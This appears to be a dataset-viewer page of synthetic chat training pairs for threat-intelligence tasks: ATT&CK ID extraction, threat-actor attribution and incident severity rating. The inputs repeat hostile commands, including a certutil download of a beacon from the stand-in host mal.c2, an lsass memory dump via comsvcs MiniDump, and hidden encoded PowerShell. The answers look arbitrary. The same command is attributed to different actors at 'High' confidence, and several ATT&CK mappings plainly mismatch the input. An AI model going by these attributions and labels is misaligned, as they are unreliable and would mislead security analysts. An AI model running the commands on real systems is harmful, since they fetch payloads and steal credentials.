messages listlengths 2 2 |
|---|
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1537 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, LOLBin, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider\", ... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.159.62.73",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\", \"TA0004\"], \"technique... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: CrackMapExec can brute force credential authentication by using a supplied list of usernames and a single password.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1110\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, TLS, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confide... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3984 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, JA3 Spoof, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confidence\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-F7MNB2VRCT)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Credential Access",
"role": "user"
},
{
"content": "{\"severity\": \... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 2619 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.0.196.25",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\", \"TA0008\", \"TA0001\"], \... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, TLS, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spid... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Monitor for processes making abnormal calls to higher privileged processes, such as a user application connecting to a VPN service.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1559\", \... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: POWERTON has used HTTP/HTTPS for C2 traffic.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1071\", \"T1071.001\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-Q7DA1D2L46)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Credential Access, Defense Evasion",
"role": "user"
},
{
"content"... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: OSX/Shlayer collects the IOPlatformUUID, session UID, and the OS version using the command sw_vers -productVersion.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1082\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 944 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, TLS, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confidenc... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 3658 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.193.54.36",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1021.... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-5ERU9X9NP3)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Privilege Escalation, Command and Control, Credential Access",
"role": "user"
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: LOLBin, Fileless, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confidence\": \"Hi... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, JA3 Spoof, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typh... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Base64, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"conf... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 2567 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.153.117.93",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\", \"TA0006\", \"TA0040\"], ... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Often Valid Accounts are required, along with access to the remote system's SMB/Windows Admin Shares for RPC communication.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, WMI, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-3NQ5KS3DY4)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Command and Control",
"role": "user"
},
{
"content": "{\"severity\": \"... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.158.216.23",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\", \"TA0001\"], \"techniques\... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 2837 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.175.156.195",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\", ... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: WMI, Fileless, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"confidence\": \"H... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-VF6D7YQ3Z5)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Defense Evasion",
"role": "user"
},
{
"content": "{\"severity\"... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: If after the package has been decoded its size is bigger than 3 bytes, the Trojan decrypts its first 11 bytes with XOR using the method similar to the one described above",
"role": "user"
},
{
"content": "{\"tactics\": [\"T... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3104 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Base64, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-W14USD6VJZ)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Defense Evasion",
"role": "user"
},
{
"content": "{\"severity... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 1477 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.74.126.82",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\", \"TA0008\"], \"techniques\": ... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1624 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, WMI, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confiden... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 667 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, WMI, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confidence... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.145.44.76",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\"], \"techniques\": [\"T... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: TLS, JA3 Spoof, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confidence\": \"High\... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Enumeration of COM objects, via Query Registry or PowerShell, may also precede malicious use.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1021.003\", \"T1021\"]}",
"role": "assistan... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-UQKCKZQ7OT)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Execution, Exfiltration",
"role": "user"
},
{
"content": "{\"s... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: LoudMiner deleted installation files after completion.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.004\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-HHRQ9BSS0Y)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Impact, Persistence, Discovery",
"role": "user"
},
{
"content": ... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: ZLib has the ability to enumerate system information.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1082\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.33.145.187",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\", \"TA0008\"], \"tec... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-678WTX17AC)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Credential Access, Command and Control, Discovery",
"role": "user"
},
{
... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.22.210.151",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\"], \"t... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-W2AOQVXV37)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation, Execution, Reconnaissance",
"role": "user"
},
... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.118.129.179",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"tec... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Base64, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confid... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Prikormka contains a module that captures screenshots of the victim's desktop.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1113\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: OwaAuth uses incoming HTTP requests with a username keyword and commands and handles them as instructions to perform actions.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-4VTP21OHF4)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Lateral Movement, Execution",
"role": "user"
},
{
"content": "{\"sever... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: APT3 has been known to stage files for exfiltration in a single location.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1074.001\", \"T1074\"]}",
"role": "assistant... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may buy and/or steal code signing certificates that can be used during targeting.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0042\"], \"techniques\": [\"T1588\", \"T1588.003\"]}",
"role": "assistan... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Another JHUHUGIT variant gathers the victim storage volume serial number and the storage device name.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1082\"]}",
"role... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: APT32 have replaced Microsoft Outlook's VbaProject.OTM file to install a backdoor macro for persistence.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1137\"]}",
"role": "assistant"
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-YY9TH2OSDQ)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Command and Control",
"role": "user"
},
{
"content": "{\"sev... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.47.33.243",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0007\", ... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.127.222.55",
"role": "user"
},
{
"content": "{\"tactics\": ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-U18K336XH0)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Persistence, Defense Evasion",
"role": "user"
},
{
"content": "{... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3690 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, LOLBin, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confidenc... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.61.190.208",
"role": "user"
},
{
"content": "{\"tactics\": [... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, TLS, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"co... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-R6FQ6173WM)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Reconnaissance, Discovery",
"role": "user"
},
{
"content... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service configurations.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Monitor for newly executed processes that may establish persistence by executing malicious content triggered by a file type association.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Base64, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"conf... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 2116 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.172.254.65",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\", \"TA0007\... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2738 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, LOLBin, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"c... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, WMI, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confid... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Chimera has collected data of interest from network shares.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1039\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-FXFGAFP09T)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Execution",
"role": "user"
},
{
"content": "{\"severity\": \"... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Exaramel for Linux uses crontab for persistence if it does not have root privileges.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0003\", \"TA0004\"], \"techniques\": [\"T1053\", \"T10... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, WMI, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"conf... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim’s cached logon credentials as the decryption key.",
"role": "... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3282 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, WMI, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"co... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-BRC2JZSLDJ)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Persistence",
"role": "user"
},
{
"content": "{\"severity\":... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup.",
"role": "user"
},
{
"content": ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-7TCDGPJSIG)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Collection",
"role": "user"
},
{
"content": "{\"severity\": \"Extreme\"... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Other common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: The command az ad user list will list all users within a domain.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1087\", \"T1087.004\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.116.185.223",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, TLS, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confidenc... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Fileless, JA3 Spoof, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"c... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.69.240.238",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Zebrocy uses SSL and AES ECB for encrypting C2 communications.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1573\", \"T1573.002\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Fileless, JA3 Spoof, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"conf... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Stuxnet transforms encrypted binary data into an ASCII string in order to use it as a URL parameter value.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1132.001\", \"T1132\"]}",
"rol... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-8GNOATXGRX)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Persistence, Command and Control",
"role": "user"
},
{
"con... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-Q0659K221K)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Initial Access, Reconnaissance, Collection",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, Fileless, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"co... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: This encoded information then gets an additional header added and sent across the network.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1132\"]}",
"role": "assista... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: master boot record wiper",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1561\", \"T1561.002\"]}",
"role": "assistant"
}
] |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Drovorub can delete specific files from a compromised host.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.004\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-3175KKSRJV)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Exfiltration, Persistence, Impact",
"role": "user"
},
{
"content": "{\"... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 2301 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.175.34.228",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0003... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-B4UJF49P34)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Lateral Movement",
"role": "user"
},
{
"content": "{\"severity\... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Command Description !Dir Lists the contents of a specified directory !Drives Enumerates the storage drives attached to the system and their respective type",
"role": "user"
},
{
"content": "{\"tactics... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-6EPUTJJK3B)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement, Persistence",
"role": "user"
},
{
"content": "{\... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.30.138.9",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"T1546.003... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.68.152.103",
"role": "user"
},
{
"content": "{\"tactics\": [\"... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 3675 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.70.201.105",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"technique... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-2L5X0ZWO0H)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Initial Access",
"role": "user"
},
{
"content": "{\"severity\":... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Base64, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spide... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.